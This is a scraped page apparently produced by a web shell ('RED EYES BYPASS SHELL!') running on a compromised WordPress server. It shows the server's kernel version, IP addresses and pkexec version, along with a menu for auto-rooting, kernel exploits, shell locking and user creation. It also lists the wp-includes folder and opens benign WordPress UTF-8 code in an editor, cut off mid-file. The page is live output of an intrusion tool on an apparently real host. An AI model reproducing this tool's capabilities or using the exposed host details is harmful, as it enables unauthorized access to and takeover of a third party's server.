Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
bigdata /
wp-includes /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
ID3
[ DIR ]
drwxr-xr-x
IXR
[ DIR ]
drwxr-xr-x
PHPMailer
[ DIR ]
drwxr-xr-x
Requests
[ DIR ]
drwxr-xr-x
SimplePie
[ DIR ]
drwxr-xr-x
Text
[ DIR ]
drwxr-xr-x
abilities-api
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
block-bindings
[ DIR ]
drwxr-xr-x
block-patterns
[ DIR ]
drwxr-xr-x
block-supports
[ DIR ]
drwxr-xr-x
blocks
[ DIR ]
drwxr-xr-x
certificates
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
customize
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
html-api
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
interactivity-api
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
l10n
[ DIR ]
drwxr-xr-x
php-compat
[ DIR ]
drwxr-xr-x
pomo
[ DIR ]
drwxr-xr-x
rest-api
[ DIR ]
drwxr-xr-x
sitemaps
[ DIR ]
drwxr-xr-x
sodium_compat
[ DIR ]
drwxr-xr-x
style-engine
[ DIR ]
drwxr-xr-x
theme-compat
[ DIR ]
drwxr-xr-x
widgets
[ DIR ]
drwxr-xr-x
abilities-api.php
23.8
KB
-rwxr-xr-x
abilities.php
7.8
KB
-rwxr-xr-x
admin-bar.php
36.1
KB
-rwxr-xr-x
atomlib.php
11.9
KB
-rwxr-xr-x
author-template.php
18.94
KB
-rwxr-xr-x
block-bindings.php
7.35
KB
-rwxr-xr-x
block-editor.php
28.6
KB
-rwxr-xr-x
block-i18n.json
316
B
-rwxr-xr-x
block-patterns.php
12.9
KB
-rwxr-xr-x
block-template-utils.php
61.02
KB
-rwxr-xr-x
block-template.php
15
KB
-rwxr-xr-x
blocks.php
112.05
KB
-rwxr-xr-x
bookmark-template.php
12.47
KB
-rwxr-xr-x
bookmark.php
15.07
KB
-rwxr-xr-x
cache-compat.php
9.84
KB
-rwxr-xr-x
cache.php
13.17
KB
-rwxr-xr-x
canonical.php
33.83
KB
-rwxr-xr-x
capabilities.php
42.63
KB
-rwxr-xr-x
category-template.php
55.71
KB
-rwxr-xr-x
category.php
12.53
KB
-rwxr-xr-x
class-IXR.php
2.55
KB
-rwxr-xr-x
class-avif-info.php
28.92
KB
-rwxr-xr-x
class-feed.php
539
B
-rwxr-xr-x
class-http.php
367
B
-rwxr-xr-x
class-json.php
42.65
KB
-rwxr-xr-x
class-oembed.php
401
B
-rwxr-xr-x
class-phpass.php
6.61
KB
-rwxr-xr-x
class-phpmailer.php
664
B
-rwxr-xr-x
class-pop3.php
20.63
KB
-rwxr-xr-x
class-requests.php
2.18
KB
-rwxr-xr-x
class-simplepie.php
453
B
-rwxr-xr-x
class-smtp.php
457
B
-rwxr-xr-x
class-snoopy.php
36.83
KB
-rwxr-xr-x
class-walker-category-dropdown.php
2.41
KB
-rwxr-xr-x
class-walker-category.php
8.28
KB
-rwxr-xr-x
class-walker-comment.php
13.89
KB
-rwxr-xr-x
class-walker-nav-menu.php
11.76
KB
-rwxr-xr-x
class-walker-page-dropdown.php
2.65
KB
-rwxr-xr-x
class-walker-page.php
7.43
KB
-rwxr-xr-x
class-wp-admin-bar.php
17.46
KB
-rwxr-xr-x
class-wp-ajax-response.php
5.14
KB
-rwxr-xr-x
class-wp-application-passwords.php
16.7
KB
-rwxr-xr-x
class-wp-block-bindings-registry.php
8.28
KB
-rwxr-xr-x
class-wp-block-bindings-source.php
2.92
KB
-rwxr-xr-x
class-wp-block-editor-context.php
1.32
KB
-rwxr-xr-x
class-wp-block-list.php
4.6
KB
-rwxr-xr-x
class-wp-block-metadata-registry.php
11.62
KB
-rwxr-xr-x
class-wp-block-parser-block.php
2.5
KB
-rwxr-xr-x
class-wp-block-parser-frame.php
1.97
KB
-rwxr-xr-x
class-wp-block-parser.php
11.25
KB
-rwxr-xr-x
class-wp-block-pattern-categories-registry.php
5.32
KB
-rwxr-xr-x
class-wp-block-patterns-registry.php
10.6
KB
-rwxr-xr-x
class-wp-block-processor.php
67.84
KB
-rwxr-xr-x
class-wp-block-styles-registry.php
6.34
KB
-rwxr-xr-x
class-wp-block-supports.php
5.49
KB
-rwxr-xr-x
class-wp-block-template.php
1.99
KB
-rwxr-xr-x
class-wp-block-templates-registry.php
7.02
KB
-rwxr-xr-x
class-wp-block-type-registry.php
4.91
KB
-rwxr-xr-x
class-wp-block-type.php
16.86
KB
-rwxr-xr-x
class-wp-block.php
24.23
KB
-rwxr-xr-x
class-wp-classic-to-block-menu-converter.php
3.97
KB
-rwxr-xr-x
class-wp-comment-query.php
47.66
KB
-rwxr-xr-x
class-wp-comment.php
9.22
KB
-rwxr-xr-x
class-wp-customize-control.php
25.51
KB
-rwxr-xr-x
class-wp-customize-manager.php
198.38
KB
-rwxr-xr-x
class-wp-customize-nav-menus.php
56.65
KB
-rwxr-xr-x
class-wp-customize-panel.php
10.46
KB
-rwxr-xr-x
class-wp-customize-section.php
10.95
KB
-rwxr-xr-x
class-wp-customize-setting.php
29.26
KB
-rwxr-xr-x
class-wp-customize-widgets.php
70.91
KB
-rwxr-xr-x
class-wp-date-query.php
35.3
KB
-rwxr-xr-x
class-wp-dependencies.php
15.02
KB
-rwxr-xr-x
class-wp-dependency.php
2.57
KB
-rwxr-xr-x
class-wp-duotone.php
39.83
KB
-rwxr-xr-x
class-wp-editor.php
70.64
KB
-rwxr-xr-x
class-wp-embed.php
15.56
KB
-rwxr-xr-x
class-wp-error.php
7.33
KB
-rwxr-xr-x
class-wp-exception.php
253
B
-rwxr-xr-x
class-wp-fatal-error-handler.php
7.96
KB
-rwxr-xr-x
class-wp-feed-cache-transient.php
3.23
KB
-rwxr-xr-x
class-wp-feed-cache.php
969
B
-rwxr-xr-x
class-wp-hook.php
16.28
KB
-rwxr-xr-x
class-wp-http-cookie.php
7.22
KB
-rwxr-xr-x
class-wp-http-curl.php
12.95
KB
-rwxr-xr-x
class-wp-http-encoding.php
6.53
KB
-rwxr-xr-x
class-wp-http-ixr-client.php
3.42
KB
-rwxr-xr-x
class-wp-http-proxy.php
5.84
KB
-rwxr-xr-x
class-wp-http-requests-hooks.php
1.97
KB
-rwxr-xr-x
class-wp-http-requests-response.php
4.3
KB
-rwxr-xr-x
class-wp-http-response.php
2.91
KB
-rwxr-xr-x
class-wp-http-streams.php
16.46
KB
-rwxr-xr-x
class-wp-http.php
40.6
KB
-rwxr-xr-x
class-wp-image-editor-gd.php
20.22
KB
-rwxr-xr-x
class-wp-image-editor-imagick.php
36.11
KB
-rwxr-xr-x
class-wp-image-editor.php
17.01
KB
-rwxr-xr-x
class-wp-list-util.php
7.27
KB
-rwxr-xr-x
class-wp-locale-switcher.php
6.62
KB
-rwxr-xr-x
class-wp-locale.php
16.49
KB
-rwxr-xr-x
class-wp-matchesmapregex.php
1.79
KB
-rwxr-xr-x
class-wp-meta-query.php
29.82
KB
-rwxr-xr-x
class-wp-metadata-lazyloader.php
6.67
KB
-rwxr-xr-x
class-wp-navigation-fallback.php
8.98
KB
-rwxr-xr-x
class-wp-network-query.php
19.42
KB
-rwxr-xr-x
class-wp-network.php
12.01
KB
-rwxr-xr-x
class-wp-object-cache.php
17.11
KB
-rwxr-xr-x
class-wp-oembed-controller.php
6.74
KB
-rwxr-xr-x
class-wp-oembed.php
30.93
KB
-rwxr-xr-x
class-wp-paused-extensions-storage.php
4.99
KB
-rwxr-xr-x
class-wp-phpmailer.php
4.25
KB
-rwxr-xr-x
class-wp-plugin-dependencies.php
24.72
KB
-rwxr-xr-x
class-wp-post-type.php
29.96
KB
-rwxr-xr-x
class-wp-post.php
6.34
KB
-rwxr-xr-x
class-wp-query.php
159.91
KB
-rwxr-xr-x
class-wp-recovery-mode-cookie-service.php
6.72
KB
-rwxr-xr-x
class-wp-recovery-mode-email-service.php
10.92
KB
-rwxr-xr-x
class-wp-recovery-mode-key-service.php
4.77
KB
-rwxr-xr-x
class-wp-recovery-mode-link-service.php
3.38
KB
-rwxr-xr-x
class-wp-recovery-mode.php
11.18
KB
-rwxr-xr-x
class-wp-rewrite.php
62.19
KB
-rwxr-xr-x
class-wp-role.php
2.46
KB
-rwxr-xr-x
class-wp-roles.php
9.17
KB
-rwxr-xr-x
class-wp-script-modules.php
31.13
KB
-rwxr-xr-x
class-wp-scripts.php
33.38
KB
-rwxr-xr-x
class-wp-session-tokens.php
7.15
KB
-rwxr-xr-x
class-wp-simplepie-file.php
3.47
KB
-rwxr-xr-x
class-wp-simplepie-sanitize-kses.php
1.87
KB
-rwxr-xr-x
class-wp-site-query.php
30.91
KB
-rwxr-xr-x
class-wp-site.php
7.29
KB
-rwxr-xr-x
class-wp-speculation-rules.php
7.35
KB
-rwxr-xr-x
class-wp-styles.php
11.86
KB
-rwxr-xr-x
class-wp-tax-query.php
19.12
KB
-rwxr-xr-x
class-wp-taxonomy.php
18.12
KB
-rwxr-xr-x
class-wp-term-query.php
39.99
KB
-rwxr-xr-x
class-wp-term.php
5.17
KB
-rwxr-xr-x
class-wp-text-diff-renderer-inline.php
979
B
-rwxr-xr-x
class-wp-text-diff-renderer-table.php
18.44
KB
-rwxr-xr-x
class-wp-textdomain-registry.php
10.24
KB
-rwxr-xr-x
class-wp-theme-json-data.php
1.77
KB
-rwxr-xr-x
class-wp-theme-json-resolver.php
34.9
KB
-rwxr-xr-x
class-wp-theme-json-schema.php
7.19
KB
-rwxr-xr-x
class-wp-theme-json.php
160.5
KB
-rwxr-xr-x
class-wp-theme.php
64.27
KB
-rwxr-xr-x
class-wp-token-map.php
27.95
KB
-rwxr-xr-x
class-wp-url-pattern-prefixer.php
4.69
KB
-rwxr-xr-x
class-wp-user-meta-session-tokens.php
2.94
KB
-rwxr-xr-x
class-wp-user-query.php
43.13
KB
-rwxr-xr-x
class-wp-user-request.php
2.25
KB
-rwxr-xr-x
class-wp-user.php
22.5
KB
-rwxr-xr-x
class-wp-walker.php
13.01
KB
-rwxr-xr-x
class-wp-widget-factory.php
3.27
KB
-rwxr-xr-x
class-wp-widget.php
18
KB
-rwxr-xr-x
class-wp-xmlrpc-server.php
210.4
KB
-rwxr-xr-x
class-wp.php
25.86
KB
-rwxr-xr-x
class-wpdb.php
115.85
KB
-rwxr-xr-x
class.wp-dependencies.php
373
B
-rwxr-xr-x
class.wp-scripts.php
343
B
-rwxr-xr-x
class.wp-styles.php
338
B
-rwxr-xr-x
comment-template.php
100.73
KB
-rwxr-xr-x
comment.php
130.93
KB
-rwxr-xr-x
compat-utf8.php
19.1
KB
-rwxr-xr-x
compat.php
17.41
KB
-rwxr-xr-x
cron.php
41.98
KB
-rwxr-xr-x
date.php
400
B
-rwxr-xr-x
default-constants.php
11.1
KB
-rwxr-xr-x
default-filters.php
37.02
KB
-rwxr-xr-x
default-widgets.php
2.24
KB
-rwxr-xr-x
deprecated.php
188.13
KB
-rwxr-xr-x
embed-template.php
338
B
-rwxr-xr-x
embed.php
38
KB
-rwxr-xr-x
error-protection.php
4.02
KB
-rwxr-xr-x
feed-atom-comments.php
5.38
KB
-rwxr-xr-x
feed-atom.php
3.05
KB
-rwxr-xr-x
feed-rdf.php
2.61
KB
-rwxr-xr-x
feed-rss.php
1.16
KB
-rwxr-xr-x
feed-rss2-comments.php
4.04
KB
-rwxr-xr-x
feed-rss2.php
3.71
KB
-rwxr-xr-x
feed.php
23.03
KB
-rwxr-xr-x
fonts.php
9.56
KB
-rwxr-xr-x
formatting.php
346.43
KB
-rwxr-xr-x
functions.php
281.84
KB
-rwxr-xr-x
functions.wp-scripts.php
14.95
KB
-rwxr-xr-x
functions.wp-styles.php
8.44
KB
-rwxr-xr-x
general-template.php
168.95
KB
-rwxr-xr-x
global-styles-and-settings.php
20.71
KB
-rwxr-xr-x
http.php
25.27
KB
-rwxr-xr-x
https-detection.php
5.72
KB
-rwxr-xr-x
https-migration.php
4.63
KB
-rwxr-xr-x
kses.php
81.72
KB
-rwxr-xr-x
l10n.php
67.18
KB
-rwxr-xr-x
link-template.php
156.36
KB
-rwxr-xr-x
load.php
55.19
KB
-rwxr-xr-x
locale.php
162
B
-rwxr-xr-x
media-template.php
61.72
KB
-rwxr-xr-x
media.php
216
KB
-rwxr-xr-x
meta.php
65
KB
-rwxr-xr-x
ms-blogs.php
25.24
KB
-rwxr-xr-x
ms-default-constants.php
4.81
KB
-rwxr-xr-x
ms-default-filters.php
6.48
KB
-rwxr-xr-x
ms-deprecated.php
21.25
KB
-rwxr-xr-x
ms-files.php
2.79
KB
-rwxr-xr-x
ms-functions.php
89.69
KB
-rwxr-xr-x
ms-load.php
19.42
KB
-rwxr-xr-x
ms-network.php
3.69
KB
-rwxr-xr-x
ms-settings.php
4.11
KB
-rwxr-xr-x
ms-site.php
40.74
KB
-rwxr-xr-x
nav-menu-template.php
25.38
KB
-rwxr-xr-x
nav-menu.php
43.33
KB
-rwxr-xr-x
option.php
102.57
KB
-rwxr-xr-x
pluggable-deprecated.php
6.18
KB
-rwxr-xr-x
pluggable.php
124.45
KB
-rwxr-xr-x
plugin.php
35.65
KB
-rwxr-xr-x
post-formats.php
6.94
KB
-rwxr-xr-x
post-template.php
67.04
KB
-rwxr-xr-x
post-thumbnail-template.php
10.62
KB
-rwxr-xr-x
post.php
289.13
KB
-rwxr-xr-x
query.php
36.23
KB
-rwxr-xr-x
registration-functions.php
200
B
-rwxr-xr-x
registration.php
200
B
-rwxr-xr-x
rest-api.php
98.29
KB
-rwxr-xr-x
revision.php
30.02
KB
-rwxr-xr-x
rewrite.php
19.03
KB
-rwxr-xr-x
robots-template.php
5.06
KB
-rwxr-xr-x
rss-functions.php
255
B
-rwxr-xr-x
rss.php
22.66
KB
-rwxr-xr-x
script-loader.php
150.38
KB
-rwxr-xr-x
script-modules.php
9.68
KB
-rwxr-xr-x
session.php
258
B
-rwxr-xr-x
shortcodes.php
23.49
KB
-rwxr-xr-x
sitemaps.php
3.16
KB
-rwxr-xr-x
speculative-loading.php
8.4
KB
-rwxr-xr-x
spl-autoload-compat.php
441
B
-rwxr-xr-x
style-engine.php
7.39
KB
-rwxr-xr-x
taxonomy.php
172.91
KB
-rwxr-xr-x
template-canvas.php
544
B
-rwxr-xr-x
template-loader.php
3.84
KB
-rwxr-xr-x
template.php
35.97
KB
-rwxr-xr-x
theme-i18n.json
1.49
KB
-rwxr-xr-x
theme-previews.php
2.84
KB
-rwxr-xr-x
theme-templates.php
6.09
KB
-rwxr-xr-x
theme.json
8.71
KB
-rwxr-xr-x
theme.php
131.84
KB
-rwxr-xr-x
update.php
37.45
KB
-rwxr-xr-x
user.php
173.89
KB
-rwxr-xr-x
utf8.php
7.09
KB
-rwxr-xr-x
vars.php
6.41
KB
-rwxr-xr-x
version.php
1.08
KB
-rwxr-xr-x
widgets.php
69.46
KB
-rwxr-xr-x
wp-db.php
445
B
-rwxr-xr-x
wp-diff.php
799
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compat-utf8.php
<?php /** * Finds spans of valid and invalid UTF-8 bytes in a given string. * * This is a low-level tool to power various UTF-8 functionality. * It scans through a string until it finds invalid byte spans. * When it does this, it does three things: * * - Assigns `$at` to the position after the last successful code point. * - Assigns `$invalid_length` to the length of the maximal subpart of * the invalid bytes starting at `$at`. * - Returns how many code points were successfully scanned. * * This information is enough to build a number of useful UTF-8 functions. * * Example: * * // ñ is U+F1, which in `ISO-8859-1`/`latin1`/`Windows-1252`/`cp1252` is 0xF1. * "Pi\xF1a" === $pineapple = mb_convert_encoding( "Piña", 'Windows-1252', 'UTF-8' ); * $at = $invalid_length = 0; * * // The first step finds the invalid 0xF1 byte. * 2 === _wp_scan_utf8( $pineapple, $at, $invalid_length ); * $at === 2; $invalid_length === 1; * * // The second step continues to the end of the string. * 1 === _wp_scan_utf8( $pineapple, $at, $invalid_length ); * $at === 4; $invalid_length === 0; * * Note! While passing an options array here might be convenient from a calling-code standpoint, * this function is intended to serve as a very low-level foundation upon which to build * higher level functionality. For the sake of keeping costs explicit all arguments are * passed directly. * * @since 6.9.0 * @access private * * @param string $bytes UTF-8 encoded string which might include invalid spans of bytes. * @param int $at Where to start scanning. * @param int $invalid_length Will be set to how many bytes are to be ignored after `$at`. * @param int|null $max_bytes Stop scanning after this many bytes have been seen. * @param int|null $max_code_points Stop scanning after this many code points have been seen. * @param bool|null $has_noncharacters Set to indicate if scanned string contained noncharacters. * @return int How many code points were successfully scanned. */ function _wp_scan_utf8( string $bytes, int &$at, int &$invalid_length, ?int $max_bytes = null, ?int $max_code_points = null, ?bool &$has_noncharacters = null ): int { $byte_length = strlen( $bytes ); $end = min( $byte_length, $at + ( $max_bytes ?? PHP_INT_MAX ) ); $invalid_length = 0; $count = 0; $max_count = $max_code_points ?? PHP_INT_MAX; $has_noncharacters = false; for ( $i = $at; $i < $end && $count <= $max_count; $i++ ) { /* * Quickly skip past US-ASCII bytes, all of which are valid UTF-8. * * This optimization step improves the speed from 10x to 100x * depending on whether the JIT has optimized the function. */ $ascii_byte_count = strspn( $bytes, "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f" . "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" . " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f", $i, $end - $i ); if ( $count + $ascii_byte_count >= $max_count ) { $at = $i + ( $max_count - $count ); $count = $max_count; return $count; } $count += $ascii_byte_count; $i += $ascii_byte_count; if ( $i >= $end ) { $at = $end; return $count; } /** * The above fast-track handled all single-byte UTF-8 characters. What * follows MUST be a multibyte sequence otherwise there’s invalid UTF-8. * * Therefore everything past here is checking those multibyte sequences. * * It may look like there’s a need to check against the max bytes here, * but since each match of a single character returns, this functions will * bail already if crossing the max-bytes threshold. This function SHALL * NOT return in the middle of a multi-byte character, so if a character * falls on each side of the max bytes, the entire character will be scanned. * * Because it’s possible that there are truncated characters, the use of * the null-coalescing operator with "\xC0" is a convenience for skipping * length checks on every continuation bytes. This works because 0xC0 is * always invalid in a UTF-8 string, meaning that if the string has been * truncated, it will find 0xC0 and reject as invalid UTF-8. * * > [The following table] lists all of the byte sequences that are well-formed * > in UTF-8. A range of byte values such as A0..BF indicates that any byte * > from A0 to BF (inclusive) is well-formed in that position. Any byte value * > outside of the ranges listed is ill-formed. * * > Table 3-7. Well-Formed UTF-8 Byte Sequences * ╭─────────────────────┬────────────┬──────────────┬─────────────┬──────────────╮ * │ Code Points │ First Byte │ Second Byte │ Third Byte │ Fourth Byte │ * ├─────────────────────┼────────────┼──────────────┼─────────────┼──────────────┤ * │ U+0000..U+007F │ 00..7F │ │ │ │ * │ U+0080..U+07FF │ C2..DF │ 80..BF │ │ │ * │ U+0800..U+0FFF │ E0 │ A0..BF │ 80..BF │ │ * │ U+1000..U+CFFF │ E1..EC │ 80..BF │ 80..BF │ │ * │ U+D000..U+D7FF │ ED │ 80..9F │ 80..BF │ │ * │ U+E000..U+FFFF │ EE..EF │ 80..BF │ 80..BF │ │ * │ U+10000..U+3FFFF │ F0 │ 90..BF │ 80..BF │ 80..BF │ * │ U+40000..U+FFFFF │ F1..F3 │ 80..BF │ 80..BF │ 80..BF │ * │ U+100000..U+10FFFF │ F4 │ 80..8F │ 80..BF │ 80..BF │ * ╰─────────────────────┴────────────┴──────────────┴─────────────┴──────────────╯ * * @see https://www.unicode.org/versions/Unicode16.0.0/core-spec/chapter-3/#G27506 */ // Valid two-byte code points. $b1 = ord( $bytes[ $i ] ); $b2 = ord( $bytes[ $i + 1 ] ?? "\xC0" ); if ( $b1 >= 0xC2 && $b1 <= 0xDF && $b2 >= 0x80 && $b2 <= 0xBF ) { ++$count; ++$i; continue; } // Valid three-byte code points. $b3 = ord( $bytes[ $i + 2 ] ?? "\xC0" ); if ( $b3 < 0x80 || $b3 > 0xBF ) { goto invalid_utf8; } if ( ( 0xE0 === $b1 && $b2 >= 0xA0 && $b2 <= 0xBF ) || ( $b1 >= 0xE1 && $b1 <= 0xEC && $b2 >= 0x80 && $b2 <= 0xBF ) || ( 0xED === $b1 && $b2 >= 0x80 && $b2 <= 0x9F ) || ( $b1 >= 0xEE && $b1 <= 0xEF && $b2 >= 0x80 && $b2 <= 0xBF ) ) { ++$count; $i += 2; // Covers the range U+FDD0–U+FDEF, U+FFFE, U+FFFF. if ( 0xEF === $b1 ) { $has_noncharacters |= ( ( 0xB7 === $b2 && $b3 >= 0x90 && $b3 <= 0xAF ) || ( 0xBF === $b2 && ( 0xBE === $b3 || 0xBF === $b3 ) ) ); } continue; } // Valid four-byte code points. $b4 = ord( $bytes[ $i + 3 ] ?? "\xC0" ); if ( $b4 < 0x80 || $b4 > 0xBF ) { goto invalid_utf8; } if ( ( 0xF0 === $b1 && $b2 >= 0x90 && $b2 <= 0xBF ) || ( $b1 >= 0xF1 && $b1 <= 0xF3 && $b2 >= 0x80 && $b2 <= 0xBF ) || ( 0xF4 === $b1 && $b2 >= 0x80 && $b2 <= 0x8F ) ) { ++$count; $i += 3; // Covers U+1FFFE, U+1FFFF, U+2FFFE, U+2FFFF, …, U+10FFFE, U+10FFFF. $has_noncharacters |= ( ( 0x0F === ( $b2 & 0x0F ) ) && 0xBF === $b3 && ( 0xBE === $b4 || 0xBF === $b4 ) ); continue; } /** * When encountering invalid byte sequences, Unicode suggests finding the * maximal subpart of a text and replacing that subpart with a single * replacement character. * * > This practice is more secure because it does not result in the * > conversion consuming parts of valid sequences as though they were * > invalid. It also guarantees at least one replacement character will * > occur for each instance of an invalid sequence in the original text. * > Furthermore, this practice can be defined consistently for better * > interoperability between different implementations of conversion. * * @see https://www.unicode.org/versions/Unicode16.0.0/core-spec/chapter-5/#G40630 */ invalid_utf8: $at = $i; $invalid_length = 1; // Single-byte and two-byte characters. if ( ( 0x00 === ( $b1 & 0x80 ) ) || ( 0xC0 === ( $b1 & 0xE0 ) ) ) { return $count; } $b2 = ord( $bytes[ $i + 1 ] ?? "\xC0" ); $b3 = ord( $bytes[ $i + 2 ] ?? "\xC0" ); // Find the maximal subpart and skip past it. if ( 0xE0 === ( $b1 & 0xF0 ) ) { // Three-byte characters. $b2_valid = ( ( 0xE0 === $b1 && $b2 >= 0xA0 && $b2 <= 0xBF ) || ( $b1 >= 0xE1 && $b1 <= 0xEC && $b2 >= 0x80 && $b2 <= 0xBF ) || ( 0xED === $b1 && $b2 >= 0x80 && $b2 <= 0x9F ) || ( $b1 >= 0xEE && $b1 <= 0xEF && $b2 >= 0x80 && $b2 <= 0xBF ) ); $invalid_length = min( $end - $i, $b2_valid ? 2 : 1 ); return $count; } elseif ( 0xF0 === ( $b1 & 0xF8 ) ) { // Four-byte characters. $b2_valid = ( ( 0xF0 === $b1 && $b2 >= 0x90 && $b2 <= 0xBF ) || ( $b1 >= 0xF1 && $b1 <= 0xF3 && $b2 >= 0x80 && $b2 <= 0xBF ) || ( 0xF4 === $b1 && $b2 >= 0x80 && $b2 <= 0x8F ) ); $b3_valid = $b3 >= 0x80 && $b3 <= 0xBF; $invalid_length = min( $end - $i, $b2_valid ? ( $b3_valid ? 3 : 2 ) : 1 ); return $count; } return $count; } $at = $i; return $count; } /** * Fallback mechanism for safely validating UTF-8 bytes. * * @since 6.9.0 * @access private * * @see wp_is_valid_utf8() * * @param string $bytes String which might contain text encoded as UTF-8. * @return bool Whether the provided bytes can decode as valid UTF-8. */ function _wp_is_valid_utf8_fallback( string $bytes ): bool { $bytes_length = strlen( $bytes ); if ( 0 === $bytes_length ) { return true; } $next_byte_at = 0; $invalid_length = 0; _wp_scan_utf8( $bytes, $next_byte_at, $invalid_length ); return $bytes_length === $next_byte_at && 0 === $invalid_length; } /** * Fallback mechanism for replacing invalid spans of UTF-8 bytes. * * Example: * * 'Pi�a' === _wp_scrub_utf8_fallback( "Pi\xF1a" ); // “ñ” is 0xF1 in Windows-1252. * * @since 6.9.0 * @access private * * @see wp_scrub_utf8() * * @param string $bytes UTF-8 encoded string which might contain spans of invalid bytes. * @return string Input string with spans of invalid bytes swapped with the replacement character. */ function _wp_scrub_utf8_fallback( string $bytes ): string { $bytes_length = strlen( $bytes ); $next_byte_at = 0; $was_at = 0; $invalid_length = 0; $scrubbed = ''; while ( $next_byte_at <= $bytes_length ) { _wp_scan_utf8( $bytes, $next_byte_at, $invalid_length ); if ( $next_byte_at >= $bytes_length ) { if ( 0 === $was_at ) { return $bytes; } return $scrubbed . substr( $bytes, $was_at, $next_byte_at - $was_at - $invalid_length ); } $scrubbed .= substr( $bytes, $was_at, $next_byte_at - $was_at ); $scrubbed .= "\u{FFFD}"; $next_byte_at += $invalid_length; $was_at = $next_byte_at; } return $scrubbed; } /** * Returns how many code points are found in the given UTF-8 string. * * Invalid spans of bytes count as a single code point according * to the maximal subpart rule. This function is a fallback method * for calling `mb_strlen( $text, 'UTF-8' )`. * * When negative values are provided for the byte offsets or length, * this will always report zero code points. * * Example: * * 4 === _wp_utf8_codepoint_count( 'text' ); * * // Groups are 'test', "\x90" as '�', 'wp', "\xE2\x80" as '�', "\xC0" as '�', and 'test'. * 13 === _wp_utf8_codepoint_count( "test\x90wp\xE2\x80\xC0test" ); * * @since 6.9.0 * @access private * * @param string $text Count code points in this string. * @param ?int $byte_offset Start counting after this many bytes in `$text`. Must be positive. * @param ?int $max_byte_length Optional. Stop counting after having scanned past this many bytes. * Default is to scan until the end of the string. Must be positive. * @return int How many code points were found. */ function _wp_utf8_codepoint_count( string $text, ?int $byte_offset = 0, ?int $max_byte_length = PHP_INT_MAX ): int { if ( $byte_offset < 0 ) { return 0; } $count = 0; $at = $byte_offset; $end = strlen( $text ); $invalid_length = 0; $max_byte_length = min( $end - $at, $max_byte_length ); while ( $at < $end && ( $at - $byte_offset ) < $max_byte_length ) { $count += _wp_scan_utf8( $text, $at, $invalid_length, $max_byte_length - ( $at - $byte_offset ) ); $count += $invalid_length > 0 ? 1 : 0; $at += $invalid_length; } return $count; } /** * Given a starting offset within a string and a maximum number of code points, * return how many bytes are occupied by the span of characters. * * Invalid spans of bytes count as a single code point according to the maximal * subpart rule. This function is a fallback method for calling * `strlen( mb_substr( substr( $text, $at ), 0, $max_code_points ) )`. * * @since 6.9.0 * @access private * * @param string $text Count bytes of span in this text. * @param int $byte_offset Start counting at this byte offset. * @param int $max_code_points Stop counting after this many code points have been seen, * or at the end of the string. * @param ?int $found_code_points Optional. Will be set to number of found code points in * span, as this might be smaller than the maximum count if * the string is not long enough. * @return int Number of bytes spanned by the code points. */ function _wp_utf8_codepoint_span( string $text, int $byte_offset, int $max_code_points, ?int &$found_code_points = 0 ): int { $was_at = $byte_offset; $invalid_length = 0; $end = strlen( $text ); $found_code_points = 0; while ( $byte_offset < $end && $found_code_points < $max_code_points ) { $needed = $max_code_points - $found_code_points; $chunk_count = _wp_scan_utf8( $text, $byte_offset, $invalid_length, null, $needed ); $found_code_points += $chunk_count; // Invalid spans only convey one code point count regardless of how long they are. if ( 0 !== $invalid_length && $found_code_points < $max_code_points ) { ++$found_code_points; $byte_offset += $invalid_length; } } return $byte_offset - $was_at; } /** * Fallback support for determining if a string contains Unicode noncharacters. * * @since 6.9.0 * @access private * * @see \wp_has_noncharacters() * * @param string $text Are there noncharacters in this string? * @return bool Whether noncharacters were found in the string. */ function _wp_has_noncharacters_fallback( string $text ): bool { $at = 0; $invalid_length = 0; $has_noncharacters = false; $end = strlen( $text ); while ( $at < $end && ! $has_noncharacters ) { _wp_scan_utf8( $text, $at, $invalid_length, null, null, $has_noncharacters ); $at += $invalid_length; } return $has_noncharacters; } /** * Converts a string from ISO-8859-1 to UTF-8, maintaining backwards compatibility * with the deprecated function from the PHP standard library. * * @since 6.9.0 * @access private * * @see \utf8_encode() * * @param string $iso_8859_1_text Text treated as ISO-8859-1 (latin1) bytes. * @return string Text converted into UTF-8. */ function _wp_utf8_encode_fallback( $iso_8859_1_text ) { $iso_8859_1_text = (string) $iso_8859_1_text; $at = 0; $was_at = 0; $end = strlen( $iso_8859_1_text ); $utf8 = ''; while ( $at < $end ) { // US-ASCII bytes are identical in ISO-8859-1 and UTF-8. These are 0x00–0x7F. $ascii_byte_count = strspn( $iso_8859_1_text, "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f" . "\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" . " !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f", $at ); if ( $ascii_byte_count > 0 ) { $at += $ascii_byte_count; continue; } // All other bytes transform into two-byte UTF-8 sequences. $code_point = ord( $iso_8859_1_text[ $at ] ); $byte1 = chr( 0xC0 | ( $code_point >> 6 ) ); $byte2 = chr( 0x80 | ( $code_point & 0x3F ) ); $utf8 .= substr( $iso_8859_1_text, $was_at, $at - $was_at ); $utf8 .= "{$byte1}{$byte2}"; ++$at; $was_at = $at; } if ( 0 === $was_at ) { return 